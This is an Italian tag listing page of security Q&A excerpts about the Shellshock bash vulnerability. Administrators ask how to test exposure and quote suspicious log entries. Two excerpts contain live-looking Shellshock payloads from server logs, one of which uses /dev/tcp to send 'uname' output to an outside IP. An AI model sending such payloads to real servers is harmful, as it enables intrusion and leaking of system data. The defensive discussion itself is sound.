Domande con tag 'shellshock'

2
risposte

Ci sono siti remoti disponibili per applicare shellshock?

Sono uno studente laureato. Stiamo cercando un sito remoto per eseguire shellshock a scopo didattico. Siti che sono volentieri vulnerabili per scopi di hacking etico ??     
posta 09.01.2016 - 05:47
1
risposta

Come capire se il sito di qualcun altro è vulnerabile a Shellshock senza averli hackerati?

Scheda di registrazione in mano, sono andato a registrare ieri uno strumento elettrico appena acquistato. Ma quando sono arrivato al sito del produttore, sono stato accolto da un'antica interfaccia homegrown contrassegnata come "Copyright (C) 20...
posta 01.10.2014 - 20:40
1
risposta

Shellshock e PHP fastcgi

Capisco che l'esecuzione di apache / mod_php sia sicura, ma non ho sentito parlare del caso di php in modalità fastcgi (via nginx / php5-fpm), quindi, chiunque può confermare che questo è sicuro?     
posta 07.10.2014 - 05:37
2
risposte

Sono "Shell Shocked" - script remoto scaricato ed eseguito - Posso vietare il download di file come misura di sicurezza

Qualche giorno fa, qualcuno ha provato una serie di richieste sulla nostra istanza di nginx. Tutto fallito tranne uno. 54.164.156.8 - - [**/Mar/2015:**********] "GET / HTTP/1.1" 200 393 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: t...
posta 18.03.2015 - 18:09
2
risposte

wrapper di script Set-uid, shell (system) (3) e Bash Function Import from Environment

Dato che è un requisito frequente per consentire agli utenti non privilegiati l'accesso limitato alle funzioni privilegiate: Talvolta gli amministratori di sistema Jobbing lo forniscono sotto forma di script di shell, che vengono quindi richia...
posta 03.10.2014 - 15:01
2
risposte

La shell vulnerabilità si estenderà alle apparecchiature di rete Cisco?

Come Cisco usa bash (e le interfacce web se non l'hai disabilitato) è suscettibile alla vulnerabilità dello shock shell?     
posta 25.09.2014 - 17:39
1
risposta

Bash Shellshock

Sto cercando di scoprire se i miei dispositivi sono vulnerabili a bash shellshock. Ho eseguito i comandi trovati su link . Sembra che i miei dispositivi siano entrambi vulnerabili a una sola delle vulnerabilità - Exploit 7 CVE-2014-6277, ma non...
posta 17.03.2015 - 13:35
1
risposta

Strana linea di log di apache [duplicato]

Ho appena trovato questa voce su uno dei miei server: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.7...
posta 17.06.2015 - 07:56
2
risposte

molti attacchi csh http shellshock

Gestisco un server pubblico che riceve circa uno shock di shell HTTP di 100 csh al giorno da fonti diverse. È un metodo GET HTTP che richiede l'URI /cgi-bin/authLogin.cgi. Sapendo che l'URI richiesto non esiste nel mio server, è normale ricev...
posta 31.12.2014 - 10:15
1
risposta

Perché Shellshock funziona nella stringa useragent?

Mi chiedevo perché Shellshock funzioni quando inserito nel useragent. Sulla base di ciò che ho potuto trovare è perché un server web (ad esempio Apache) utilizza la stringa useragent nel suo funzionamento interno. Perché un server web dov...
posta 17.11.2014 - 13:49